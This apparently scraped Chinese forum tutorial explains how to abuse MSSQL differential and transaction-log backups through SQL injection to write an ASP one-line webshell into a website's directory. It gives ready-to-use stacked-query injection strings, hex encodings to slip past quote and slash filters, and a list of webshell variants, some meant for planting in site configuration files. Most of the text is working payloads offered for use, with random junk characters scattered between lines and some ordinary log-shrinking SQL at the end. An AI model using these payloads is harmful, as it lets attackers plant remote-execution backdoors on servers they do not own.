MSsql差异备份总结

admin

差异备份的流程大概这样：
6 L/ U4 C; I% x0 q& B# L1.完整备份一次(保存位置当然可以改)
! l" q# E# M' P& ybackup database 库名 to disk = 'c:\ddd.bak';--
. b9 n" d) K- G
1 T: p. G: V+ z4 R( {3 X" E/ g* i! L2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
1 _% K( x2 R5 ^4 Z, t$ Q' J
5 ~! l8 ?; ]! C3.进行差异备份
) R7 Q$ Z. P. _% Obackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
  E2 l- G0 O5 u6 o# C9 [
7 F4 \, c7 {5 {/ |  @上面
0x3C25657865637574652872657175657374282261222929253E
3 |1 {8 e6 [  `$ G9 _就是一句话木马的内容：<%execute(request("a"))%>

% J. M+ a* _8 X( E3 E如下是网上常见的差异备份代码，思路一样！
===================================================
. e+ P# \; v3 G: G$ f, k( L  W" p利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
4 B, q+ a7 F) ^# b9 v0 s3 m
2 E5 l' R  d+ J( x) `create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

4 Y+ q9 c& h: Q4 X+ e( X% a
7 Q4 y7 d; p1 p1 Xinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

& _/ @5 s4 q6 z8 s. ~+ Kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。
% f' {) x$ p5 M" e
) Z" W: a. n( e/ M6 K; }" \0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

$ o, G( k3 s# f9 C, H声明：方法不是我想的，我只是写工具，默认得到shell是
) E( S9 J$ u  O<%execute(request("a"))%>
# J1 V4 A' u+ ~===============================================================
+ E+ F' j- }& k" m# |) n
我发现上面代码，有时会无效，而直接用
7 n* D) P+ G; r! h# Q2 K& j
: D4 _7 A" h0 U& p6 Z5 U5 ]! Rbackup database 库名 to disk = 'c:\ddd.bak'

  e: `3 L. y/ L, ]9 p9 r  X6 k- gcreate table [dbo].[dtest] ([cmd] [image]);
2 T8 I8 I6 f$ f. b! U  g* P
! G! n/ l- c# g3 N! Yinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* m! K0 a! S# w: _% }8 O
. ^' {; l+ I8 |. L" fbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
1 A# h+ _; C/ ?4 w) G+ b
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
2 j8 O8 a" F3 m+ ?
% {7 t/ {" w0 J- R. t3 ]6 h库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
' b, M! H$ U0 ~" L! i* L
: C- w  |! w. f' f+ M网上还有log增量备份的，我也把他记录一下
  v4 Z8 U/ z) h. _1 F4 U=====================================================
另一种log增量备份技术:
8 D' P+ w$ a, t" r9 _, w& _
2 u" ]; _+ X8 w& }' Y';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--
# W$ u0 K1 `/ p
# W0 C' u- Z5 S; a';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--
2 @0 }& }/ q$ y( V
';drop table cmd--

% D& M8 I' [" z) k" F2 U5 P" D& m';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
% \( q( @  t+ S8 t+ _5 S: J0 M9253EDA 是一句话小马16进制转来的
( s+ L( k6 [; L  _8 O  B
说到一句话马，还可以有这么几种写法：
$ _6 o! a! t9 z2 M0 G
& S, z  z6 g' O' A4 W! w8 ?6 La)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
' p( S) p9 y8 r! {+ `+ H+ O9 Rd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
5 M/ h6 z$ r+ `7 R! d* pf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
  s! T# d5 X2 |* d
1 D$ f! v4 O/ j; F: o=============================================
* z# U/ u2 w$ [
5 x, w( a- t: l% r+ B当遇到差备过滤了/时用这个语句代替

, p" M" I3 i, o1 Q  n, K( hdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
$ \6 g: k% s) F  b
* V" |9 Z( E% l5 A9 d# A$ g; m把要执行的语句转16进制然后用exec执行
+ b; u. u- m# l1 }$ W

& q" g3 q( e8 R! m减少备份文件大小方法如下:
: s1 G+ @0 u8 d  W9 J' Z4 g
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
8 e. j+ k; i5 U5 {2
- ?3 m" }8 P" N, a6 t4 Y3 t* E4 B. pid=1;backup database model to disk='你的路径‘ with differential,format;--



; ~; ^" o6 W& ZSQL语句清理日志
注：test为数据库名

--清空日志
4 F# ~$ r5 n8 H$ s4 mDUMP TRANSACTION test WITH NO_LOG

# W% U$ \, F+ ~2 X/ R--截断事务日志
3 b3 d2 K  O) P# s! G5 c( lBACKUP LOG test WITH NO_LOG

. [5 Q& Y, |0 ~$ ]* ^2 W  I, i/ L. J--收缩数据库
- L+ t8 v# {8 k0 y" @4 G6 TDBCC SHRINKDATABASE(test)
4 A; [; c8 |& I' F0 A. ^+ L
6 ~# I7 R6 e* O9 m; o' `& J1 b0 a/ ]--收缩指定数据文件,1是文件号,可以通过这个语句查询到
0 W- N% g* o) D5 U  @' m2 OSelect * from sysfiles DBCC SHRINKFILE(1)
( x+ ^; ]  f- y; \8 I
--以后能自动收缩
( r4 C! L( R! XEXEC sp_dboption 'test', 'autoshrink', 'TRUE'